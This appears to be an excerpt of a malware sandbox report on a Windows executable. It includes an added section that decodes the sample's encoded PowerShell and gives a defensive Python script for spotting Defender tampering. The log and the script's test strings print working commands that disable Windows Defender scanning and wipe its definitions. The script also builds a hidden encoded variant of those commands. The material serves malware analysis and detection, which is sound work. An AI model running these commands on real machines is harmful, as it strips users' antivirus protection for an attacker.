aoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagm
acgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabg
aoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
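The `-encodedcommand` argument in the process-creation entries above is printed case-folded (the report renders command lines in lower case), and Base64 is case-sensitive, so the blob as shown cannot be decoded. Restoring the case of its first 72 characters by hand gives the UTF-16LE text `$source = @"` followed by `using System;`, and the tail of the blob reads back as `Add-Type -TypeDefinition $source -ReferencedAssemblies` (the command line is truncated in the report), i.e. an inline C# compile, which is what the "Dot net compiler compiles file from suspicious location" signature is reacting to. The triage helper below is an added example and is not part of the Joe Sandbox report: it decodes `-EncodedCommand` blobs, refuses case-folded ones instead of emitting garbage, and flags the Defender-weakening `Set-MpPreference` arguments and the `MpCmdRun -RemoveDefinitions` call seen in the `cmd.exe` entries, on the raw line and on the decoded payload. The function names and the `WEAKENING` table are mine; `REPORT_LINE` and `TAMPER_LINE` are copied from the entries above (the first cut to the blob's first 72 characters), `RESTORED_LINE` is that prefix with its case put back, and `HIDDEN_LINE` is a constructed line that hides the same tampering inside an encoded command.

```python
"""Triage for the process-creation lines in the report: decode PowerShell
-EncodedCommand blobs (UTF-16LE, Base64) and flag Defender tampering.
Added example; not code from the sandbox report or from the sample."""
import base64
import binascii
import re

# -EncodedCommand and the abbreviations PowerShell accepts for it.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# "-Name Value" pairs on a lower-cased line; a value starting with "-" is the
# next switch, so switches without a value (e.g. -force) are skipped.
PARAM_RE = re.compile(r"-([a-z]+)\s+(\$?[a-z0-9]+)")

# Set-MpPreference parameters and the values that weaken Defender (my table).
WEAKENING = {
    "disablerealtimemonitoring": {"$true", "1"},
    "disableioavprotection": {"$true", "1"},
    "disablescriptscanning": {"$true", "1"},
    "disableintrusionpreventionsystem": {"$true", "1"},
    "disablebehaviormonitoring": {"$true", "1"},
    "mapsreporting": {"disabled", "0"},
    "submitsamplesconsent": {"neversend", "2"},
    "enablecontrolledfolderaccess": {"disabled", "0"},
    "enablenetworkprotection": {"disabled", "0", "auditmode", "2"},
}


def decode_encoded_command(cmdline):
    """Return (status, text); status is 'absent', 'case_folded', 'invalid' or 'ok'."""
    low = cmdline.lower()
    if "powershell" not in low and "pwsh" not in low:
        return "absent", None
    m = ENC_FLAG.search(cmdline)
    if not m:
        return "absent", None
    blob = m.group(1)
    # Base64 is case-sensitive: a long blob with no upper-case letters has been
    # case-normalised by the logging pipeline and cannot be recovered.
    if len(blob) >= 16 and blob.lower() == blob:
        return "case_folded", None
    blob += "=" * (-len(blob) % 4)          # truncated lines lose their padding
    try:
        raw = base64.b64decode(blob)
    except (binascii.Error, ValueError):
        return "invalid", None
    if len(raw) % 2:
        raw = raw[:-1]                       # odd trailing byte from truncation
    try:
        return "ok", raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return "invalid", None


def defender_tampering(text):
    """List Defender-weakening settings found in a command line or script."""
    low = text.lower()
    findings = []
    if "set-mppreference" in low or "add-mppreference" in low:
        for name, value in PARAM_RE.findall(low):
            if name in WEAKENING and value in WEAKENING[name]:
                findings.append(f"{name}={value}")
        if "-exclusionpath" in low or "-exclusionprocess" in low:
            findings.append("exclusion-added")
    if "mpcmdrun" in low and "-removedefinitions" in low:
        findings.append("removedefinitions")
    return findings


def triage(cmdline):
    """Decode if needed, then check the raw line and the decoded payload."""
    status, decoded = decode_encoded_command(cmdline)
    findings = defender_tampering(cmdline)
    if decoded:
        findings += defender_tampering(decoded)
    return {"encoded": status, "decoded": decoded, "findings": findings}


# First 72 characters of the blob exactly as the report prints it (case-folded).
CASE_FOLDED_BLOB = "jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsa"
# The same 72 characters with their case restored by hand.
RESTORED_BLOB = "JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsA"
PREFIX = 'c:\\windows\\system32\\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand '
REPORT_LINE = PREFIX + CASE_FOLDED_BLOB
RESTORED_LINE = PREFIX + RESTORED_BLOB
# Defender tampering command line copied from the report.
TAMPER_LINE = (
    'c:\\windows\\system32\\cmd.exe /c "powershell set-mppreference '
    '-disableintrusionpreventionsystem $true -disableioavprotection $true '
    '-disablerealtimemonitoring $true -disablescriptscanning $true '
    '-enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode '
    '-force -mapsreporting disabled -submitsamplesconsent neversend && '
    'powershell set-mppreference -submitsamplesconsent 2 & '
    '"%programfiles%\\windows defender\\mpcmdrun.exe" -removedefinitions -all"'
)
# Constructed: the same tampering hidden inside an encoded command.
HIDDEN_PAYLOAD = "Set-MpPreference -DisableRealtimeMonitoring $true -MAPSReporting Disabled"
HIDDEN_LINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    HIDDEN_PAYLOAD.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    for line in (REPORT_LINE, RESTORED_LINE, TAMPER_LINE, HIDDEN_LINE):
        print(triage(line))
```

Two points worth keeping in mind when running this over real telemetry: feed it the original-case command line from Sysmon event 1 or Security event 4688, not a lower-cased copy from a sandbox view or a case-insensitive SIEM field, or every encoded command will come back `case_folded`; and on a host with Defender Tamper Protection enabled, most of the `Set-MpPreference` changes and the `-RemoveDefinitions` call listed above are rejected, so `Get-MpPreference` should be compared against the flagged values before concluding that protection was actually turned off.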
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080DB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,97_2_00007FF7080DB340
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26895E0 cpuid 4_2_00007FF7C26895E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\_lzma.pyd VolumeInformationJump to behavior
